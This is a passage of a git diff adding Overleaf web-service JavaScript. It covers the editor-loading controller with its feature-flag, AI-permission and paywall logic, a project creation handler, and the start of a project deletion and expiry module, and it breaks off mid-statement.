+ const isAdminOrTemplateOwner = + hasAdminAccess(user) || Settings.templates?.user_id === userId + const showTemplatesServerPro = + Features.hasFeature('templates-server-pro') && isAdminOrTemplateOwner + + const debugPdfDetach = shouldDisplayFeature('debug_pdf_detach') + + const detachRole = req.params.detachRole + + const showSymbolPalette = + !Features.hasFeature('saas') || + (user.features && user.features.symbolPalette) + + const userInNonIndividualSub = + userIsMemberOfGroupSubscription || userHasInstitutionLicence + + const userHasPremiumSub = + subscription && !isStandaloneAiAddOnPlanCode(subscription.planCode) + + // Persistent upgrade prompts + // in header & in share project modal + const showUpgradePrompt = + Features.hasFeature('saas') && + userId && + !userHasPremiumSub && + !userInNonIndividualSub + + let aiFeaturesAllowed = false + if (userId && Features.hasFeature('saas')) { + try { + // exit early if the user couldnt use ai anyways, since permissions checks are expensive + const canUserWriteOrReviewProjectContent = + privilegeLevel === PrivilegeLevels.READ_AND_WRITE || + privilegeLevel === PrivilegeLevels.OWNER || + privilegeLevel === PrivilegeLevels.REVIEW + + if (canUserWriteOrReviewProjectContent) { + // check permissions for user and project owner, to see if they allow AI on the project + const permissionsResults = await Modules.promises.hooks.fire( + 'projectAllowsCapability', + project, + userId, + ['use-ai'] + ) + const aiAllowed = permissionsResults.every( + result => result === true + ) + + aiFeaturesAllowed = aiAllowed + } + } catch (err) { + // still allow users to access project if we cant get their permissions, but disable AI feature + aiFeaturesAllowed = false + } + } + + const hasNonRecurlySubscription = + subscription && !subscription.recurlySubscription_id + const hasManuallyCollectedSubscription = + subscription?.collectionMethod === 'manual' + const canPurchaseAddons = !( + hasNonRecurlySubscription || hasManuallyCollectedSubscription + ) + const assistantDisabled = user.aiErrorAssistant?.enabled === false // the assistant has been manually disabled by the user + const canUseErrorAssistant = + (user.features?.aiErrorAssistant || canPurchaseAddons) && + !assistantDisabled + + let featureUsage = {} + + if (Features.hasFeature('saas')) { + const usagesLeft = await Modules.promises.hooks.fire( + 'remainingFeatureAllocation', + userId + ) + usagesLeft?.forEach(usage => { + featureUsage = { ...featureUsage, ...usage } + }) + } + + let inEnterpriseCommons = false + const affiliations = userValues.affiliations || [] + for (const affiliation of affiliations) { + inEnterpriseCommons = + inEnterpriseCommons || affiliation.institution?.enterpriseCommons + } + + // check if a user has never tried writefull before (writefull.enabled will be null) + // if they previously accepted writefull, or are have been already assigned to a trial, user.writefull will be true, + // if they explicitly disabled it, user.writefull will be false + if ( + aiFeaturesAllowed && + user.writefull?.enabled === null && + !userIsMemberOfGroupSubscription && + !inEnterpriseCommons + ) { + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'writefull-auto-account-creation' + ) + + if (variant === 'enabled') { + await UserUpdater.promises.updateUser(userId, { + $set: { + writefull: { enabled: true, autoCreatedAccount: true }, + }, + }) + user.writefull.enabled = true + user.writefull.autoCreatedAccount = true + } else { + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'writefull-auto-load' + ) + if (variant === 'enabled') { + await UserUpdater.promises.updateUser(userId, { + $set: { + writefull: { enabled: true }, + }, + }) + user.writefull.enabled = true + user.writefull.firstAutoLoad = true + } + } + } + + const template = + detachRole === 'detached' + ? 'project/ide-react-detached' + : 'project/ide-react' + + let chatEnabled + if (Features.hasFeature('saas')) { + chatEnabled = + Features.hasFeature('chat') && req.capabilitySet.has('chat') + } else { + chatEnabled = Features.hasFeature('chat') + } + + const isOverleafAssistBundleEnabled = + splitTestAssignments['overleaf-assist-bundle']?.variant === 'enabled' + + let fullFeatureSet = user?.features + if (!anonymous) { + // generate users feature set including features added, or overriden via modules + const moduleFeatures = + (await Modules.promises.hooks.fire( + 'getModuleProvidedFeatures', + userId + )) || [] + fullFeatureSet = FeaturesHelper.computeFeatureSet([ + user.features, + ...moduleFeatures, + ]) + } + + const isPaywallChangeCompileTimeoutEnabled = + splitTestAssignments['paywall-change-compile-timeout']?.variant === + 'enabled' + + const paywallPlans = + isPaywallChangeCompileTimeoutEnabled && + (await ProjectController._getPaywallPlansPrices(req, res)) + + const customerIoEnabled = + await SplitTestHandler.promises.hasUserBeenAssignedToVariant( + req, + userId, + 'customer-io-trial-conversion', + 'enabled', + true + ) + + const addonPrices = + isOverleafAssistBundleEnabled && + (await ProjectController._getAddonPrices(req, res)) + + let planCode = subscription?.planCode + if (!planCode && !userInNonIndividualSub) { + planCode = 'personal' + } + + const planDetails = Settings.plans.find(p => p.planCode === planCode) + + res.render(template, { + title: project.name, + priority_title: true, + bodyClasses: ['editor'], + project_id: project._id, + projectName: project.name, + user: { + id: userId, + email: user.email, + first_name: user.first_name, + last_name: user.last_name, + referal_id: user.referal_id, + signUpDate: user.signUpDate, + allowedFreeTrial, + hasRecurlySubscription: subscription?.recurlySubscription_id != null, + featureSwitches: user.featureSwitches, + features: fullFeatureSet, + featureUsage, + refProviders: _.mapValues(user.refProviders, Boolean), + writefull: { + enabled: Boolean(user.writefull?.enabled && aiFeaturesAllowed), + autoCreatedAccount: Boolean(user.writefull?.autoCreatedAccount), + firstAutoLoad: Boolean(user.writefull?.firstAutoLoad), + }, + alphaProgram: user.alphaProgram, + betaProgram: user.betaProgram, + labsProgram: user.labsProgram, + inactiveTutorials: TutorialHandler.getInactiveTutorials(user), + isAdmin: hasAdminAccess(user), + planCode, + planName: planDetails?.name, + isAnnualPlan: planCode && planDetails?.annual, + isMemberOfGroupSubscription: userIsMemberOfGroupSubscription, + hasInstitutionLicence: userHasInstitutionLicence, + }, + userSettings: { + mode: user.ace.mode, + editorTheme: user.ace.theme, + fontSize: user.ace.fontSize, + autoComplete: user.ace.autoComplete, + autoPairDelimiters: user.ace.autoPairDelimiters, + pdfViewer: user.ace.pdfViewer, + syntaxValidation: user.ace.syntaxValidation, + fontFamily: user.ace.fontFamily || 'lucida', + lineHeight: user.ace.lineHeight || 'normal', + overallTheme: user.ace.overallTheme, + mathPreview: user.ace.mathPreview, + referencesSearchMode: user.ace.referencesSearchMode, + enableNewEditor: user.ace.enableNewEditor ?? true, + }, + labsExperiments: user.labsExperiments ?? [], + privilegeLevel, + anonymous, + isTokenMember, + isRestrictedTokenMember: AuthorizationManager.isRestrictedUser( + userId, + privilegeLevel, + isTokenMember, + isInvitedMember + ), + chatEnabled, + projectHistoryBlobsEnabled: Features.hasFeature( + 'project-history-blobs' + ), + roMirrorOnClientNoLocalStorage: + Settings.adminOnlyLogin || project.name.startsWith('Debug: '), + languages: Settings.languages, + learnedWords, + editorThemes: THEME_LIST, + legacyEditorThemes: LEGACY_THEME_LIST, + maxDocLength: Settings.max_doc_length, + maxReconnectGracefullyIntervalMs: + Settings.maxReconnectGracefullyIntervalMs, + brandVariation, + allowedImageNames, + gitBridgePublicBaseUrl: Settings.gitBridgePublicBaseUrl, + gitBridgeEnabled: Features.hasFeature('git-bridge'), + wsUrl, + showSupport: Features.hasFeature('support'), + showTemplatesServerPro, + debugPdfDetach, + showSymbolPalette, + symbolPaletteAvailable: Features.hasFeature('symbol-palette'), + userRestrictions: Array.from(req.userRestrictions || []), + showAiErrorAssistant: aiFeaturesAllowed && canUseErrorAssistant, + detachRole, + metadata: { viewport: false }, + showUpgradePrompt, + fixedSizeDocument: true, + hasTrackChangesFeature: Features.hasFeature('track-changes'), + projectTags, + odcRole: + // only use the ODC role value if the split test is enabled + splitTestAssignments['paywall-change-compile-timeout']?.variant === + 'enabled' + ? odcRole + : null, + isSaas: Features.hasFeature('saas'), + shouldLoadHotjar: splitTestAssignments.hotjar?.variant === 'enabled', + isReviewerRoleEnabled: + reviewerRoleAssignment?.variant === 'enabled' || + Object.keys(project.reviewer_refs || {}).length > 0, + isPaywallChangeCompileTimeoutEnabled, + isOverleafAssistBundleEnabled, + paywallPlans, + customerIoEnabled, + addonPrices, + }) + timer.done() + } catch (err) { + OError.tag(err, 'error getting details for project page') + return next(err) + } + }, + + async _getPaywallPlansPrices( + req, + res, + paywallPlans = ['collaborator', 'student'] + ) { + const plansData = {} + + const locale = req.i18n.language + const { currency } = await SubscriptionController.getRecommendedCurrency( + req, + res + ) + + paywallPlans.forEach(plan => { + const planPrice = Settings.localizedPlanPricing[currency][plan].monthly + const formattedPlanPrice = formatCurrency( + planPrice, + currency, + locale, + true + ) + plansData[plan] = formattedPlanPrice + }) + return plansData + }, + + async _getAddonPrices(req, res, addonPlans = ['assistBundle']) { + const plansData = {} + + const locale = req.i18n.language + const { currency } = await SubscriptionController.getRecommendedCurrency( + req, + res + ) + + addonPlans.forEach(plan => { + const annualPrice = Settings.localizedAddOnsPricing[currency][plan].annual + const monthlyPrice = + Settings.localizedAddOnsPricing[currency][plan].monthly + + plansData[plan] = { + annual: formatCurrency(annualPrice, currency, locale, true), + monthly: formatCurrency(monthlyPrice, currency, locale, true), + } + }) + return plansData + }, + + async _refreshFeatures(req, user) { + // If the feature refresh has failed in this session, don't retry + // it - require the user to log in again. + if (req.session.feature_refresh_failed) { + metrics.inc('features-refresh', 1, { + path: 'load-editor', + status: 'skipped', + }) + return user + } + // If the refresh takes too long then return the current + // features. Note that the user.features property may still be + // updated in the background after the promise is resolved. + const abortController = new AbortController() + const refreshTimeoutHandler = async () => { + await setTimeout(5000, { signal: abortController.signal }) + req.session.feature_refresh_failed = { + reason: 'timeout', + at: new Date(), + } + metrics.inc('features-refresh', 1, { + path: 'load-editor', + status: 'timeout', + }) + return user + } + + // try to refresh user features now + const timer = new metrics.Timer('features-refresh-on-load-editor') + + return Promise.race([ + refreshTimeoutHandler(), + (async () => { + try { + user.features = await FeaturesUpdater.promises.refreshFeatures( + user._id, + 'load-editor' + ) + metrics.inc('features-refresh', 1, { + path: 'load-editor', + status: 'success', + }) + } catch (err) { + // keep a record to prevent unneceary retries and leave + // the original features unmodified if the refresh failed + req.session.feature_refresh_failed = { + reason: 'error', + at: new Date(), + } + metrics.inc('features-refresh', 1, { + path: 'load-editor', + status: 'error', + }) + } + abortController.abort() + timer.done() + return user + })(), + ]) + }, + _buildProjectList(allProjects, userId) { + let project + const { + owned, + review, + readAndWrite, + readOnly, + tokenReadAndWrite, + tokenReadOnly, + } = allProjects + const projects = [] + for (project of owned) { + projects.push( + ProjectController._buildProjectViewModel( + project, + 'owner', + Sources.OWNER, + userId + ) + ) + } + // Invite-access + for (project of readAndWrite) { + projects.push( + ProjectController._buildProjectViewModel( + project, + 'readWrite', + Sources.INVITE, + userId + ) + ) + } + for (project of review) { + projects.push( + ProjectController._buildProjectViewModel( + project, + 'review', + Sources.INVITE, + userId + ) + ) + } + for (project of readOnly) { + projects.push( + ProjectController._buildProjectViewModel( + project, + 'readOnly', + Sources.INVITE, + userId + ) + ) + } + // Token-access + // Only add these projects if they're not already present, this gives us cascading access + // from 'owner' => 'token-read-only' + for (project of tokenReadAndWrite) { + if ( + projects.filter(p => p.id.toString() === project._id.toString()) + .length === 0 + ) { + projects.push( + ProjectController._buildProjectViewModel( + project, + 'readAndWrite', + Sources.TOKEN, + userId + ) + ) + } + } + for (project of tokenReadOnly) { + if ( + projects.filter(p => p.id.toString() === project._id.toString()) + .length === 0 + ) { + projects.push( + ProjectController._buildProjectViewModel( + project, + 'readOnly', + Sources.TOKEN, + userId + ) + ) + } + } + + return projects + }, + _buildProjectViewModel(project, accessLevel, source, userId) { + const archived = ProjectHelper.isArchived(project, userId) + // If a project is simultaneously trashed and archived, we will consider it archived but not trashed. + const trashed = ProjectHelper.isTrashed(project, userId) && !archived + + const model = { + id: project._id, + name: project.name, + lastUpdated: project.lastUpdated, + lastUpdatedBy: project.lastUpdatedBy, + publicAccessLevel: project.publicAccesLevel, + accessLevel, + source, + archived, + trashed, + owner_ref: project.owner_ref, + isV1Project: false, + } + if (accessLevel === PrivilegeLevels.READ_ONLY && source === Sources.TOKEN) { + model.owner_ref = null + model.lastUpdatedBy = null + } + return model + }, + _buildPortalTemplatesList(affiliations) { + if (affiliations == null) { + affiliations = [] + } + const portalTemplates = [] + for (const aff of affiliations) { + if ( + aff.portal && + aff.portal.slug && + aff.portal.templates_count && + aff.portal.templates_count > 0 + ) { + const portalPath = aff.institution.isUniversity ? '/edu/' : '/org/' + portalTemplates.push({ + name: aff.institution.name, + url: Settings.siteUrl + portalPath + aff.portal.slug, + }) + } + } + return portalTemplates + }, +} + +const defaultSettingsForAnonymousUser = userId => ({ + id: userId, + ace: { + mode: 'none', + theme: 'textmate', + fontSize: '12', + autoComplete: true, + spellCheckLanguage: '', + pdfViewer: '', + syntaxValidation: true, + }, + subscription: { + freeTrial: { + allowed: true, + }, + }, + featureSwitches: { + github: false, + }, + alphaProgram: false, + betaProgram: false, + writefull: { + enabled: false, + }, +}) + +const defaultUserValues = () => ({ + user: defaultSettingsForAnonymousUser(null), + learnedWords: [], + projectTags: [], + userHasInstitutionLicence: false, + subscription: undefined, + isTokenMember: false, + isInvitedMember: false, +}) + +const THEME_LIST = [ + 'cobalt', + 'dracula', + 'eclipse', + 'monokai', + 'overleaf', + 'textmate', +] + +const LEGACY_THEME_LIST = [ + 'ambiance', + 'chaos', + 'chrome', + 'clouds', + 'clouds_midnight', + 'crimson_editor', + 'dawn', + 'dreamweaver', + 'github', + 'gob', + 'gruvbox', + 'idle_fingers', + 'iplastic', + 'katzenmilch', + 'kr_theme', + 'kuroir', + 'merbivore', + 'merbivore_soft', + 'mono_industrial', + 'nord_dark', + 'pastel_on_dark', + 'solarized_dark', + 'solarized_light', + 'sqlserver', + 'terminal', + 'tomorrow', + 'tomorrow_night', + 'tomorrow_night_blue', + 'tomorrow_night_bright', + 'tomorrow_night_eighties', + 'twilight', + 'vibrant_ink', + 'xcode', +] + +const ProjectController = { + archiveProject: expressify(_ProjectController.archiveProject), + cloneProject: expressify(_ProjectController.cloneProject), + deleteProject: expressify(_ProjectController.deleteProject), + expireDeletedProject: expressify(_ProjectController.expireDeletedProject), + expireDeletedProjectsAfterDuration: expressify( + _ProjectController.expireDeletedProjectsAfterDuration + ), + loadEditor: expressify(_ProjectController.loadEditor), + newProject: expressify(_ProjectController.newProject), + projectEntitiesJson: expressify(_ProjectController.projectEntitiesJson), + renameProject: expressify(_ProjectController.renameProject), + restoreProject: expressify(_ProjectController.restoreProject), + trashProject: expressify(_ProjectController.trashProject), + unarchiveProject: expressify(_ProjectController.unarchiveProject), + untrashProject: expressify(_ProjectController.untrashProject), + updateProjectAdminSettings: expressify( + _ProjectController.updateProjectAdminSettings + ), + updateProjectSettings: expressify(_ProjectController.updateProjectSettings), + userProjectsJson: expressify(_ProjectController.userProjectsJson), + _buildProjectList: _ProjectController._buildProjectList, + _buildProjectViewModel: _ProjectController._buildProjectViewModel, + _injectProjectUsers: _ProjectController._injectProjectUsers, + _isInPercentageRollout: _ProjectController._isInPercentageRollout, + _refreshFeatures: _ProjectController._refreshFeatures, + _getPaywallPlansPrices: _ProjectController._getPaywallPlansPrices, + _getAddonPrices: _ProjectController._getAddonPrices, +} + +module.exports = ProjectController diff --git a/services/web/app/src/Features/Project/ProjectCreationHandler.js b/services/web/app/src/Features/Project/ProjectCreationHandler.js new file mode 100644 index 0000000..3829caa --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectCreationHandler.js @@ -0,0 +1,255 @@ +const OError = require('@overleaf/o-error') +const metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { ObjectId } = require('mongodb-legacy') +const Features = require('../../infrastructure/Features') +const { Project } = require('../../models/Project') +const { Folder } = require('../../models/Folder') +const ProjectEntityUpdateHandler = require('./ProjectEntityUpdateHandler') +const ProjectDetailsHandler = require('./ProjectDetailsHandler') +const HistoryManager = require('../History/HistoryManager') +const { User } = require('../../models/User') +const fs = require('fs') +const path = require('path') +const { callbackify } = require('util') +const _ = require('lodash') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') + +const MONTH_NAMES = [ + 'January', + 'February', + 'March', + 'April', + 'May', + 'June', + 'July', + 'August', + 'September', + 'October', + 'November', + 'December', +] + +const templateProjectDir = Features.hasFeature('saas') + ? 'example-project' + : 'example-project-sp' + +async function createBlankProject( + ownerId, + projectName, + attributes = {}, + options +) { + const isImport = attributes && attributes.overleaf + const project = await _createBlankProject( + ownerId, + projectName, + attributes, + options + ) + const segmentation = _.pick(attributes, [ + 'fromV1TemplateId', + 'fromV1TemplateVersionId', + ]) + Object.assign(segmentation, attributes.segmentation) + segmentation.projectId = project._id + if (isImport) { + AnalyticsManager.recordEventForUserInBackground( + ownerId, + 'project-imported', + segmentation + ) + } else { + AnalyticsManager.recordEventForUserInBackground( + ownerId, + 'project-created', + segmentation + ) + } + return project +} + +async function createProjectFromSnippet(ownerId, projectName, docLines) { + const project = await _createBlankProject(ownerId, projectName) + AnalyticsManager.recordEventForUserInBackground(ownerId, 'project-created', { + projectId: project._id, + }) + await _createRootDoc(project, ownerId, docLines) + return project +} + +async function createBasicProject(ownerId, projectName) { + const project = await _createBlankProject(ownerId, projectName) + + const docLines = await _buildTemplate('mainbasic.tex', ownerId, projectName) + await _createRootDoc(project, ownerId, docLines) + + AnalyticsManager.recordEventForUserInBackground(ownerId, 'project-created', { + projectId: project._id, + }) + + return project +} + +async function createExampleProject(ownerId, projectName) { + const project = await _createBlankProject(ownerId, projectName) + + await _addExampleProjectFiles(ownerId, projectName, project) + + AnalyticsManager.recordEventForUserInBackground(ownerId, 'project-created', { + projectId: project._id, + }) + + return project +} + +async function _addExampleProjectFiles(ownerId, projectName, project) { + const mainDocLines = await _buildTemplate( + `${templateProjectDir}/main.tex`, + ownerId, + projectName + ) + await _createRootDoc(project, ownerId, mainDocLines) + + const bibDocLines = await _buildTemplate( + `${templateProjectDir}/sample.bib`, + ownerId, + projectName + ) + await ProjectEntityUpdateHandler.promises.addDoc( + project._id, + project.rootFolder[0]._id, + 'sample.bib', + bibDocLines, + ownerId, + null + ) + + const frogPath = path.join( + __dirname, + `/../../../templates/project_files/${templateProjectDir}/frog.jpg` + ) + await ProjectEntityUpdateHandler.promises.addFile( + project._id, + project.rootFolder[0]._id, + 'frog.jpg', + frogPath, + null, + ownerId, + null + ) +} + +async function _createBlankProject( + ownerId, + projectName, + attributes = {}, + { skipCreatingInTPDS = false } = {} +) { + metrics.inc('project-creation') + const timer = new metrics.Timer('project-creation') + await ProjectDetailsHandler.promises.validateProjectName(projectName) + + const rootFolder = new Folder({ name: 'rootFolder' }) + + attributes.lastUpdatedBy = attributes.owner_ref = new ObjectId(ownerId) + attributes.name = projectName + const project = new Project(attributes) + + // Initialise the history unless the caller has overridden it in the attributes + // (to allow scripted creation of projects without full project history) + if (project.overleaf.history.id == null && !attributes.overleaf) { + const historyId = await HistoryManager.promises.initializeProject( + project._id + ) + if (historyId != null) { + project.overleaf.history.id = historyId + } + } + + // All the projects are initialised with Full Project History. This property + // is still set for backwards compatibility: Server Pro requires all projects + // have it set to `true` since SP 4.0 + project.overleaf.history.display = true + + if (Settings.currentImageName) { + // avoid clobbering any imageName already set in attributes (e.g. importedImageName) + if (!project.imageName) { + project.imageName = Settings.currentImageName + } + } + project.rootFolder[0] = rootFolder + const user = await User.findById(ownerId, { + 'ace.spellCheckLanguage': 1, + _id: 1, + }) + project.spellCheckLanguage = user.ace.spellCheckLanguage + const historyRangesSupportAssignment = + await SplitTestHandler.promises.getAssignmentForUser( + user._id, + 'history-ranges-support' + ) + if (historyRangesSupportAssignment.variant === 'enabled') { + project.overleaf.history.rangesSupportEnabled = true + } + await project.save() + if (!skipCreatingInTPDS) { + await TpdsUpdateSender.promises.createProject({ + projectId: project._id, + projectName, + ownerId, + userId: ownerId, + }) + } + timer.done() + return project +} + +async function _createRootDoc(project, ownerId, docLines) { + try { + const { doc } = await ProjectEntityUpdateHandler.promises.addDoc( + project._id, + project.rootFolder[0]._id, + 'main.tex', + docLines, + ownerId, + null + ) + await ProjectEntityUpdateHandler.promises.setRootDoc(project._id, doc._id) + } catch (error) { + throw OError.tag(error, 'error adding root doc when creating project') + } +} + +async function _buildTemplate(templateName, userId, projectName) { + const user = await User.findById(userId, 'first_name last_name') + + const templatePath = path.join( + __dirname, + `/../../../templates/project_files/${templateName}` + ) + const template = fs.readFileSync(templatePath) + const data = { + project_name: projectName, + user, + year: new Date().getUTCFullYear(), + month: MONTH_NAMES[new Date().getUTCMonth()], + } + const output = _.template(template.toString())(data) + return output.split('\n') +} + +module.exports = { + createBlankProject: callbackify(createBlankProject), + createProjectFromSnippet: callbackify(createProjectFromSnippet), + createBasicProject: callbackify(createBasicProject), + createExampleProject: callbackify(createExampleProject), + promises: { + createBlankProject, + createProjectFromSnippet, + createBasicProject, + createExampleProject, + }, +} diff --git a/services/web/app/src/Features/Project/ProjectDeleter.js b/services/web/app/src/Features/Project/ProjectDeleter.js new file mode 100644 index 0000000..62d893d --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectDeleter.js @@ -0,0 +1,434 @@ +const _ = require('lodash') +const { db, ObjectId } = require('../../infrastructure/mongodb') +const Modules = require('../../infrastructure/Modules') +const { callbackify } = require('util') +const { Project } = require('../../models/Project') +const { DeletedProject } = require('../../models/DeletedProject') +const { ProjectAuditLogEntry } = require('../../models/ProjectAuditLogEntry') +const Errors = require('../Errors/Errors') +const logger = require('@overleaf/logger') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const TagsHandler = require('../Tags/TagsHandler') +const ProjectHelper = require('./ProjectHelper') +const ProjectDetailsHandler = require('./ProjectDetailsHandler') +const CollaboratorsHandler = require('../Collaborators/CollaboratorsHandler') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const DocstoreManager = require('../Docstore/DocstoreManager') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') +const HistoryManager = require('../History/HistoryManager') +const FilestoreHandler = require('../FileStore/FileStoreHandler') +const ChatApiHandler = require('../Chat/ChatApiHandler') +const moment = require('moment') +const { promiseMapWithLimit } = require('@overleaf/promise-utils') +const { READ_PREFERENCE_SECONDARY } = require('../../infrastructure/mongodb') + +const EXPIRE_PROJECTS_AFTER_DAYS = 90 +const PROJECT_EXPIRATION_BATCH_SIZE = 10000 + +module.exports = { + markAsDeletedByExternalSource: callbackify(markAsDeletedByExternalSource), + unmarkAsDeletedByExternalSource: callbackify(unmarkAsDeletedByExternalSource), + deleteUsersProjects: callbackify(deleteUsersProjects), + expireDeletedProjectsAfterDuration: callbackify( + expireDeletedProjectsAfterDuration + ), + restoreProject: callbackify(restoreProject), + archiveProject: callbackify(archiveProject), + unarchiveProject: callbackify(unarchiveProject), + trashProject: callbackify(trashProject), + untrashProject: callbackify(untrashProject), + deleteProject: callbackify(deleteProject), + undeleteProject: callbackify(undeleteProject), + expireDeletedProject: callbackify(expireDeletedProject), + promises: { + archiveProject, + unarchiveProject, + trashProject, + untrashProject, + deleteProject, + undeleteProject, + expireDeletedProject, + markAsDeletedByExternalSource, + unmarkAsDeletedByExternalSource, + deleteUsersProjects, + expireDeletedProjectsAfterDuration, + restoreProject, + }, +} + +async function markAsDeletedByExternalSource(projectId) { + logger.debug( + { projectId }, + 'marking project as deleted by external data source' + ) + await Project.updateOne( + { _id: projectId }, + { deletedByExternalDataSource: true } + ).exec() + EditorRealTimeController.emitToRoom( + projectId, + 'projectRenamedOrDeletedByExternalSource' + ) +} + +async function unmarkAsDeletedByExternalSource(projectId) { + await Project.updateOne( + { _id: projectId }, + { deletedByExternalDataSource: false } + ).exec() +} + +async function deleteUsersProjects(userId) { + const projects = await Project.find({ owner_ref: userId }).exec() + await promiseMapWithLimit(5, projects, project => deleteProject(project._id)) + await CollaboratorsHandler.promises.removeUserFromAllProjects(userId) +} + +async function expireDeletedProjectsAfterDuration() { + const deletedProjects = await DeletedProject.find( + { + 'deleterData.deletedAt': { + $lt: new Date(moment().subtract(EXPIRE_PROJECTS_AFTER_DAYS, 'days')), + }, + project: { $type: 'object' }, + }, + { 'deleterData.deletedProjectId': 1 } + ) + .limit(PROJECT_EXPIRATION_BATCH_SIZE) + .read(READ_PREFERENCE_SECONDARY) + const projectIds = _.shuffle( + deletedProjects.map( + deletedProject => deletedProject.deleterData.deletedProjectId + ) + ) + for (const projectId of projectIds) { + await expireDeletedProject(projectId) + } +} + +async function restoreProject(projectId) { + await Project.updateOne( + { _id: projectId }, + { $unset: { archived: true } } + ).exec() +} + +async function archiveProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + const archived = ProjectHelper.calculateArchivedArray( + project, + userId, + 'ARCHIVE' + ) + + await Project.updateOne( + { _id: projectId }, + { $set: { archived }, $pull: { trashed: new ObjectId(userId) } } + ) + } catch (err) { + logger.warn({ err }, 'problem archiving project') + throw err + } +} + +async function unarchiveProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + + const archived = ProjectHelper.calculateArchivedArray( + project, + userId, + 'UNARCHIVE' + ) + + await Project.updateOne({ _id: projectId }, { $set: { archived } }) + } catch (err) { + logger.warn({ err }, 'problem unarchiving project') + throw err + } +} + +async function trashProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + + const archived = ProjectHelper.calculateArchivedArray( + project, + userId, + 'UNARCHIVE' + ) + + await Project.updateOne( + { _id: projectId }, + { + $addToSet: { trashed: new ObjectId(userId) }, + $set: { archived }, + } + ) + } catch (err) { + logger.warn({ err }, 'problem trashing project') + throw err + } +} + +async function untrashProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + + await Project.updateOne( + { _id: projectId }, + { $pull: { trashed: new ObjectId(userId) } } + ) + } catch (err) { + logger.warn({ err }, 'problem untrashing project') + throw err + } +} + +async function deleteProject(projectId, options = {}) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + + await DocumentUpdaterHandler.promises.flushProjectToMongoAndDelete( + projectId + ) + + try { + // OPTIMIZATION: flush docs out of mongo + await DocstoreManager.promises.archiveProject(projectId) + } catch (err) { + // It is OK to fail here, the docs will get hard-deleted eventually after + // the grace-period for soft-deleted projects has passed. + logger.warn( + { projectId, err }, + 'failed archiving doc via docstore as part of project soft-deletion' + ) + } + + const memberIds = await CollaboratorsGetter.promises.getMemberIds(projectId) + + // fire these jobs in the background + for (const memberId of memberIds) { + TagsHandler.promises + .removeProjectFromAllTags(memberId, projectId) + .catch(err => { + logger.err( + { err, memberId, projectId }, + 'failed to remove project from tags' + ) + }) + } + + const deleterData = { + deletedAt: new Date(), + deleterId: + options.deleterUser != null ? options.deleterUser._id : undefined, + deleterIpAddress: options.ipAddress, + deletedProjectId: project._id, + deletedProjectOwnerId: project.owner_ref, + deletedProjectCollaboratorIds: project.collaberator_refs, + deletedProjectReadOnlyIds: project.readOnly_refs, + deletedProjectReviewerIds: project.reviewer_refs, + deletedProjectReadWriteTokenAccessIds: + project.tokenAccessReadAndWrite_refs, + deletedProjectOverleafId: project.overleaf + ? project.overleaf.id + : undefined, + deletedProjectOverleafHistoryId: + project.overleaf && project.overleaf.history + ? project.overleaf.history.id + : undefined, + deletedProjectReadOnlyTokenAccessIds: project.tokenAccessReadOnly_refs, + deletedProjectReadWriteToken: project.tokens.readAndWrite, + deletedProjectReadOnlyToken: project.tokens.readOnly, + deletedProjectLastUpdatedAt: project.lastUpdated, + } + + Object.keys(deleterData).forEach(key => + deleterData[key] === undefined ? delete deleterData[key] : '' + ) + + await DeletedProject.updateOne( + { 'deleterData.deletedProjectId': projectId }, + { project, deleterData }, + { upsert: true } + ) + + await Project.deleteOne({ _id: projectId }).exec() + } catch (err) { + logger.warn({ err }, 'problem deleting project') + throw err + } + + logger.debug({ projectId }, 'successfully deleted project') +} + +async function undeleteProject(projectId, options = {}) { + projectId = new ObjectId(projectId) + const deletedProject = await DeletedProject.findOne({ + 'deleterData.deletedProjectId': projectId, + }).exec() + + if (!deletedProject) { + throw new Errors.NotFoundError('project_not_found') + } + + if (!deletedProject.project) { + throw new Errors.NotFoundError('project_too_old_to_restore') + } + + const restored = new Project(deletedProject.project) + + if (options.userId) { + restored.owner_ref = options.userId + } + + // if we're undeleting, we want the document to show up + restored.name = await ProjectDetailsHandler.promises.generateUniqueName( + deletedProject.deleterData.deletedProjectOwnerId, + restored.name + ' (Restored)' + ) + restored.archived = undefined + + if (restored.deletedDocs && restored.deletedDocs.length > 0) { + await promiseMapWithLimit(10, restored.deletedDocs, async deletedDoc => { + // back fill context of deleted docs + const { _id: docId, name, deletedAt } = deletedDoc + await DocstoreManager.promises.deleteDoc( + projectId, + docId, + name, + deletedAt + ) + }) + restored.deletedDocs = [] + } + if (restored.deletedFiles && restored.deletedFiles.length > 0) { + filterDuplicateDeletedFilesInPlace(restored) + const deletedFiles = restored.deletedFiles.map(file => { + // break free from the model + file = file.toObject() + + // add projectId + file.projectId = projectId + return file + }) + await db.deletedFiles.insertMany(deletedFiles) + restored.deletedFiles = [] + } + + // we can't use Mongoose to re-insert the project, as it won't + // create a new document with an _id already specified. We need to + // insert it directly into the collection + + await db.projects.insertOne(restored) + await DeletedProject.deleteOne({ _id: deletedProject._id }).exec() +} + +async function expireDeletedProject(projectId) { + try { + const activeProject = await Project.findById(projectId).exec() + if (activeProject) { + // That project is active. The deleted project record might be there + // because of an incomplete delete or undelete operation. Clean it up and + // return. + await DeletedProject.deleteOne({ + 'deleterData.deletedProjectId': projectId, + }) + await ProjectAuditLogEntry.deleteMany({ projectId }) + return + } + const deletedProject = await DeletedProject.findOne({ + 'deleterData.deletedProjectId': projectId, + }).exec() + if (!deletedProject) { + throw new 